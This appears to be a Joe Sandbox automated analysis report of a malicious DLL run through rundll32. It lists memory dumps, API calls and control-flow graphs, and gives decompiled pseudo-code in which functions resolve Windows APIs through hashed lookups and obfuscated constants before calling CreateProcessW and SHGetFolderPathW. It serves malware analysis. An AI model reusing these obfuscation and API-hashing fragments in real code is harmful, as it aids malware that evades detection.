                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                      • String ID: .$.$2$3$DASHBOARD$d$d$e$kre3.l$kxnY_L?zqlSEuu5S2VFol6SH1q?86X^fU74B$l$l$l$l$l$l$l$n$ndldl
                                                                                                                      • API String ID: 572389289-1239791992
                                                                                                                      • Opcode ID: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction ID: 6af05ad5a12929315e9cbc9f274344785a9cdc676413f0efaf09fcd5afa7189b
                                                                                                                      • Opcode Fuzzy Hash: 98028d4a9ad56c9c2945884bd3b0525fd052d9c80c20be7c289abbf1d5f68ff6
                                                                                                                      • Instruction Fuzzy Hash: 50613FB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                      • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1452528299-0
                                                                                                                      • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                      • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                      • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 10006A9C
                                                                                                                        • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                        • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                        • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 501242067-0
                                                                                                                      • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                      • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                      • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                      • GlobalHandle.KERNEL32(00727B00), ref: 100208A9
                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                      • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                      • GlobalHandle.KERNEL32(00727B00), ref: 100208DB
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                      • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                      • _memset.LIBCMT ref: 10020911
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 496899490-0
                                                                                                                      • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                      • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                      • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • __lock.LIBCMT ref: 1002FA87
                                                                                                                        • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                        • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                        • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                      • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                      • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                      • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                      • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2714421763-0
                                                                                                                      • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                      • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                      • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 220 1bea7b-1beb35 call 1bcf25 call 1b2d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E001BEA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E001BCF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E001B2D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 001BEB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: 8458057e6953d71bb48db50da3d5bd639218defebda17f88215d7ec21a40a87c
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: EA119732D00208BBDB14DEE6C94A8DFBFB6EB85310F108099F504A6210E7714B64AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 240 10036624-10036642 HeapCreate 241 10036647-10036654 call 100365c9 240->241 242 10036644-10036646 240->242 245 10036656-10036663 call 10035aca 241->245 246 1003667a-1003667d 241->246 245->246 249 10036665-10036678 HeapDestroy 245->249 249->242
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                      • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3296620671-0
                                                                                                                      • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                      • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                      • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 250 100019c0-100019ee 251 10001a02-10001a0e 250->251 252 10001a14-10001a1b 251->252 253 10001b06 251->253 254 10001a83-10001a9e call 10001990 252->254 255 10001a1d-10001a2a 252->255 256 10001b0b-10001b0e 253->256 265 10001aa0-10001aa2 254->265 266 10001aa4-10001ac9 VirtualAlloc 254->266 257 10001a2c-10001a4e VirtualAlloc 255->257 258 10001a7e 255->258 260 10001a50-10001a52 257->260 261 10001a57-10001a7b call 100017c0 257->261 258->251 260->256 261->258 265->256 268 10001acb-10001acd 266->268 269 10001acf-10001afe call 10001810 266->269 268->256 269->253
                                                                                                                      APIs
                                                                                                                      • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                      • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.525704176.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.525659251.0000000010000000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526098175.0000000010046000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526203773.0000000010053000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526247370.0000000010057000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                      • Associated: 0000000B.00000002.526360152.000000001005A000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4275171209-0
                                                                                                                      • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                      • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                      • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 272 1c679c-1c6863 call 1bcf25 call 1b2d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E001C679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E001BCF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E001B2D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNEL32(?,00D9A4AC,00000000,00000000,?,00000000,00000000,00000000,?,0009AF77), ref: 001C685C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 963392458-0
                                                                                                                      • Opcode ID: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction ID: 7b19a71af537b600b0fd74417aa76981ec9603e3fb0e5ebf3dbf4a981a07cac0
                                                                                                                      • Opcode Fuzzy Hash: 1da9d84ba9731b44f90d75a5bdd1d83cf5135f1bd2c9de3e9664fac0f2fd65d2
                                                                                                                      • Instruction Fuzzy Hash: 8921E772900248BBCF119FD5CD09CDFBFB9EF99714F008188FA1466120D7B68A64EBA0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 277 1c3cbb-1c3d40 call 1b2d9f ExitProcess
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E001C3CBB() {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				signed int _t37;
                                                                                                                      
                                                                                                                      				_v20 = _v20 & 0x00000000;
                                                                                                                      				_v24 = 0x868838;
                                                                                                                      				_v16 = 0xb6c7ac;
                                                                                                                      				_t37 = 0x79;
                                                                                                                      				_v16 = _v16 * 0x7d;
                                                                                                                      				_v16 = _v16 ^ 0x593c5b8b;
                                                                                                                      				_v8 = 0x23929;
                                                                                                                      				_v8 = _v8 | 0xd856564b;
                                                                                                                      				_v8 = _v8 << 0xd;
                                                                                                                      				_v8 = _v8 >> 1;
                                                                                                                      				_v8 = _v8 ^ 0x67f2afdd;
                                                                                                                      				_v12 = 0x42ac5b;
                                                                                                                      				_v12 = _v12 / _t37;
                                                                                                                      				_v12 = _v12 ^ 0x0009f0c4;
                                                                                                                      				E001B2D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
                                                                                                                      				ExitProcess(0);
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNELBASE(00000000), ref: 001C3D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: 9e78f225bfae1d3bfc508dda359df71d3bfa44271057a411e49207b86c248e2d
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: 060104B6D0120CFFDB04DFE5D946A9DBBB0EB40304F508199E925AB290D7B85B54DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 297 1cfc96-1cfd28 call 1bcf25 call 1b2d9f lstrcmpiW
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E001CFC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t32;
                                                                                                                      				int _t40;
                                                                                                                      				signed int _t42;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E001BCF25(_t32);
                                                                                                                      				_v8 = 0x178fa1;
                                                                                                                      				_v8 = _v8 | 0x2f4d5c19;
                                                                                                                      				_v8 = _v8 + 0xda24;
                                                                                                                      				_t42 = 0x35;
                                                                                                                      				_v8 = _v8 / _t42;
                                                                                                                      				_v8 = _v8 ^ 0x00e923af;
                                                                                                                      				_v16 = 0xca5f26;
                                                                                                                      				_v16 = _v16 << 0xe;
                                                                                                                      				_v16 = _v16 ^ 0x97c71065;
                                                                                                                      				_v12 = 0xeb54f5;
                                                                                                                      				_v12 = _v12 >> 4;
                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E001B2D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 001CFD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.524616955.00000000001B0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000B.00000002.524808983.00000000001D5000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_1b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 86d4dfa5d7d001d3aeb68339f50a8100663d2ad7278a4b4efcd12d34e0bfe9a4
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
